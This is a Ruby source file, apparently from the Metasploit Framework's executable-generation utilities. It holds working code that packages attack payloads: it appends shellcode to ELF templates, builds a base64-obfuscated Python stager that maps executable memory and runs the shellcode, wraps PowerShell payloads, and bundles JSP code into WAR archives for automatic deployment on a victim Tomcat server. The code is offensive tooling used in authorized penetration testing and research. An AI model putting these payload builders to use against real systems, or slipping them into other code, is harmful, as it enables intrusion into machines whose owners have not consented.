1
# -*- coding: binary -*-
2
module Msf::Util::EXE::Common
3
  require 'rex'
4
  require 'rex/peparsey'
5
  require 'rex/pescan'
6
  require 'rex/random_identifier'
7
  require 'rex/zip'
8
  require 'rex/powershell'
9
  require 'metasm'
10
  require 'digest/sha1'
11

12
  def self.included(base)
13
    base.extend(ClassMethods)
14
  end
15

16
  module ClassMethods
17
    # Generates a ZIP file.
18
    #
19
    # @param files [Array<Hash>] Items to compress. Each item is a hash that supports these options:
20
    #  * :data - The content of the file.
21
    #  * :fname - The file path in the ZIP file
22
    #  * :comment - A comment
23
    # @example Compressing two files, one in a folder called 'test'
24
    #   Msf::Util::EXE.to_zip([{data: 'AAAA', fname: "file1.txt"}, {data: 'data', fname: 'test/file2.txt'}])
25
    # @return [String]
26
    def to_zip(files)
27
      zip = Rex::Zip::Archive.new
28

29
      files.each do |f|
30
        data    = f[:data]
31
        fname   = f[:fname]
32
        comment = f[:comment] || ''
33
        zip.add_file(fname, data, comment)
34
      end
35

36
      zip.pack
37
    end
38

39
    # Generates a default template
40
    #
41
    # @param  opts [Hash] The options hash
42
    # @option opts [String] :template, the template type for the executable
43
    # @option opts [String] :template_path, the path for the template
44
    # @option opts [Bool] :fallback, If there are no options set, default options will be used
45
    # @param  exe  [String] Template type. If undefined, will use the default.
46
    # @param  path [String] Where you would like the template to be saved.
47
    def set_template_default(opts, exe = nil, path = nil)
48
      # If no path specified, use the default one
49
      path ||= File.join(Msf::Config.data_directory, "templates")
50

51
      # If there's no default name, we must blow it up.
52
      unless exe
53
        raise RuntimeError, 'Ack! Msf::Util::EXE.set_template_default called ' +
54
        'without default exe name!'
55
      end
56

57
      # Use defaults only if nothing is specified
58
      opts[:template_path] ||= path
59
      opts[:template] ||= exe
60

61
      # Only use the path when the filename contains no separators.
62
      unless opts[:template].include?(File::SEPARATOR)
63
        opts[:template] = File.join(opts[:template_path], opts[:template])
64
      end
65

66
      # Check if it exists now
67
      return if File.file?(opts[:template])
68
      # If it failed, try the default...
69
      if opts[:fallback]
70
        default_template = File.join(path, exe)
71
        if File.file?(default_template)
72
          # Perhaps we should warn about falling back to the default?
73
          opts.merge!({ :fellback => default_template })
74
          opts[:template] = default_template
75
        end
76
      end
77
    end
78

79
    # read_replace_script_template
80
    #
81
    # @param filename [String] Name of the file
82
    # @param hash_sub [Hash]
83
    def read_replace_script_template(filename, hash_sub)
84
      template_pathname = File.join(Msf::Config.data_directory, "templates",
85
                                    "scripts", filename)
86
      template = ''
87
      File.open(template_pathname, "rb") {|f| template = f.read}
88
      template % hash_sub
89
    end
90

91
      # get_file_contents
92
    #
93
    # @param perms  [String]
94
    # @param file   [String]
95
    # @return       [String]
96
    def get_file_contents(file, perms = "rb")
97
      contents = ''
98
      File.open(file, perms) {|fd| contents = fd.read(fd.stat.size)}
99
      contents
100
    end
101

102
    # find_payload_tag
103
    #
104
    # @param mo       [String]
105
    # @param err_msg  [String]
106
    # @raise [RuntimeError] if the "PAYLOAD:" is not found
107
    # @return         [Integer]
108
    def find_payload_tag(mo, err_msg)
109
      bo = mo.index('PAYLOAD:')
110
      unless bo
111
        raise RuntimeError, err_msg
112
      end
113
      bo
114
    end
115

116
    def elf?(code)
117
      code[0..3] == "\x7FELF"
118
    end
119

120
    def macho?(code)
121
      magic = code&.byteslice(0, 4)
122
      magic == "\xCF\xFA\xED\xFE".b || magic == "\xCE\xFA\xED\xFE".b || magic == "\xCA\xFE\xBA\xBE".b
123
    end
124

125
    # Create an ELF executable containing the payload provided in +code+
126
    #
127
    # For the default template, this method just appends the payload, checks if
128
    # the template is 32 or 64 bit and adjusts the offsets accordingly
129
    # For user-provided templates, modifies the header to mark all executable
130
    # segments as writable and overwrites the entrypoint (usually _start) with
131
    # the payload.
132
    # @param framework  [Msf::Framework]  The framework of you want to use
133
    # @param opts       [Hash]
134
    # @option           [String] :template
135
    # @param template   [String]
136
    # @param code       [String]
137
    # @param big_endian [Boolean]  Set to "false" by default
138
    # @return           [String]
139
    def to_exe_elf(framework, opts, template, code, big_endian=false)
140
      if elf? code
141
        return code
142
      end
143

144
      # Allow the user to specify their own template
145
      set_template_default(opts, template)
146

147
      # The old way to do it is like other formats, just overwrite a big
148
      # block of rwx mem with our shellcode.
149
      #bo = elf.index( "\x90\x90\x90\x90" * 1024 )
150
      #co = elf.index( " " * 512 )
151
      #elf[bo, 2048] = [code].pack('a2048') if bo
152

153
      # The new template is just an ELF header with its entry point set to
154
      # the end of the file, so just append shellcode to it and fixup
155
      # p_filesz and p_memsz in the header for a working ELF executable.
156
      elf = get_file_contents(opts[:template])
157
      elf << code
158

159
      # Check EI_CLASS to determine if the header is 32 or 64 bit
160
      # Use the proper offsets and pack size
161
      case elf[4,1].unpack("C").first
162
      when 1 # ELFCLASS32 - 32 bit (ruby 1.9+)
163
        if big_endian
164
          elf[0x44,4] = [elf.length].pack('N') #p_filesz
165
          elf[0x48,4] = [elf.length + code.length].pack('N') #p_memsz
166
        else # little endian
167
          elf[0x44,4] = [elf.length].pack('V') #p_filesz
168
          elf[0x48,4] = [elf.length + code.length].pack('V') #p_memsz
169
        end
170
      when 2 # ELFCLASS64 - 64 bit (ruby 1.9+)
171
        if big_endian
172
          elf[0x60,8] = [elf.length].pack('Q>') #p_filesz
173
          elf[0x68,8] = [elf.length + code.length].pack('Q>') #p_memsz
174
        else # little endian
175
          elf[0x60,8] = [elf.length].pack('Q<') #p_filesz
176
          elf[0x68,8] = [elf.length + code.length].pack('Q<') #p_memsz
177
        end
178
      else
179
        raise RuntimeError, "Invalid ELF template: EI_CLASS value not supported"
180
      end
181

182
      elf
183
    end
184

185
    def to_python_reflection(framework, arch, code, exeopts)
186
      unless [ ARCH_X86, ARCH_X64, ARCH_AARCH64, ARCH_ARMLE, ARCH_MIPSBE, ARCH_MIPSLE, ARCH_PPC ].include? arch
187
        raise "Msf::Util::EXE.to_python_reflection is not compatible with #{arch}"
188
      end
189

190
      python_code = <<~PYTHON
191
        #{Rex::Text.to_python(code)}
192
        import ctypes,os
193
        if os.name == 'nt':
194
          cbuf = (ctypes.c_char * len(buf)).from_buffer_copy(buf)
195
          ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_void_p
196
          ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_long(0),ctypes.c_long(len(buf)),ctypes.c_int(0x3000),ctypes.c_int(0x40))
197
          ctypes.windll.kernel32.RtlMoveMemory.argtypes = [ctypes.c_void_p,ctypes.c_void_p,ctypes.c_int]
198
          ctypes.windll.kernel32.RtlMoveMemory(ptr,cbuf,ctypes.c_int(len(buf)))
199
          ctypes.CFUNCTYPE(ctypes.c_int)(ptr)()
200
        else:
201
          import mmap
202
          from ctypes.util import find_library
203
          c = ctypes.CDLL(find_library('c'))
204
          c.mmap.restype = ctypes.c_void_p
205
          ptr = c.mmap(0,len(buf),mmap.PROT_READ|mmap.PROT_WRITE,mmap.MAP_ANONYMOUS|mmap.MAP_PRIVATE,-1,0)
206
          ctypes.memmove(ptr,buf,len(buf))
207
          c.mprotect.argtypes = [ctypes.c_void_p,ctypes.c_int,ctypes.c_int]
208
          c.mprotect(ptr,len(buf),mmap.PROT_READ|mmap.PROT_EXEC)
209
          ctypes.CFUNCTYPE(ctypes.c_int)(ptr)()
210
      PYTHON
211

212
      "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('#{Rex::Text.encode_base64(python_code)}')[0]))"
213
    end
214

215
    def to_win32pe_psh_msil(framework, code, opts = {})
216
      Rex::Powershell::Payload.to_win32pe_psh_msil(Rex::Powershell::Templates::TEMPLATE_DIR, code)
217
    end
218

219
    def to_win32pe_psh_rc4(framework, code, opts = {})
220
      # unlike other to_win32pe_psh_* methods, this expects powershell code, not asm
221
      # this method should be called after other to_win32pe_psh_* methods to wrap the output
222
      Rex::Powershell::Payload.to_win32pe_psh_rc4(Rex::Powershell::Templates::TEMPLATE_DIR, code)
223
    end
224

225
    # Creates a Web Archive (WAR) file from the provided jsp code.
226
    #
227
    # On Tomcat, WAR files will be deployed into a directory with the same name
228
    # as the archive, e.g. +foo.war+ will be extracted into +foo/+. If the
229
    # server is in a default configuration, deoployment will happen
230
    # automatically. See
231
    # {http://tomcat.apache.org/tomcat-5.5-doc/config/host.html the Tomcat
232
    # documentation} for a description of how this works.
233
    #
234
    # @param jsp_raw [String] JSP code to be added in a file called +jsp_name+
235
    #   in the archive. This will be compiled by the victim servlet container
236
    #   (e.g., Tomcat) and act as the main function for the servlet.
237
    # @param opts [Hash]
238
    # @option opts :jsp_name [String] Name of the <jsp-file> in the archive
239
    #   _without the .jsp extension_. Defaults to random.
240
    # @option opts :app_name [String] Name of the app to put in the <servlet-name>
241
    #   tag. Mostly irrelevant, except as an identifier in web.xml. Defaults to
242
    #   random.
243
    # @option opts :extra_files [Array<String,String>] Additional files to add
244
    #   to the archive. First element is filename, second is data
245
    #
246
    # @todo Refactor to return a {Rex::Zip::Archive} or {Rex::Zip::Jar}
247
    #
248
    # @return [String]
249
    def to_war(jsp_raw, opts = {})
250
      jsp_name = opts[:jsp_name]
251
      jsp_name ||= Rex::Text.rand_text_alpha_lower(rand(8..15))
252
      app_name = opts[:app_name]
253
      app_name ||= Rex::Text.rand_text_alpha_lower(rand(8..15))
254

255
      meta_inf = [ 0xcafe, 0x0003 ].pack('Vv')
256
      manifest = "Manifest-Version: 1.0\r\nCreated-By: 1.6.0_17 (Sun Microsystems Inc.)\r\n\r\n"
257
      web_xml = %q{<?xml version="1.0"?>
258
  <!DOCTYPE web-app PUBLIC
259
  "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
260
  "http://java.sun.com/dtd/web-app_2_3.dtd">
261
  <web-app>
262
  <servlet>
263
  <servlet-name>NAME</servlet-name>
264
  <jsp-file>/PAYLOAD.jsp</jsp-file>
265
  </servlet>
266
  </web-app>
267
  }
268
      web_xml.gsub!('NAME', app_name)
269
      web_xml.gsub!('PAYLOAD', jsp_name)
270

271
      zip = Rex::Zip::Archive.new
272
      zip.add_file('META-INF/', '', meta_inf)
273
      zip.add_file('META-INF/MANIFEST.MF', manifest)
274
      zip.add_file('WEB-INF/', '')
275
      zip.add_file('WEB-INF/web.xml', web_xml)
276
      # add the payload
277
      zip.add_file("#{jsp_name}.jsp", jsp_raw)
278

279
      # add extra files
280
      if opts[:extra_files]
281
        opts[:extra_files].each { |el| zip.add_file(el[0], el[1]) }
282
      end
283

284
      zip.pack
285
    end
286
  end
287

288
  class << self
289
    include ClassMethods
290
  end
291
end
292

293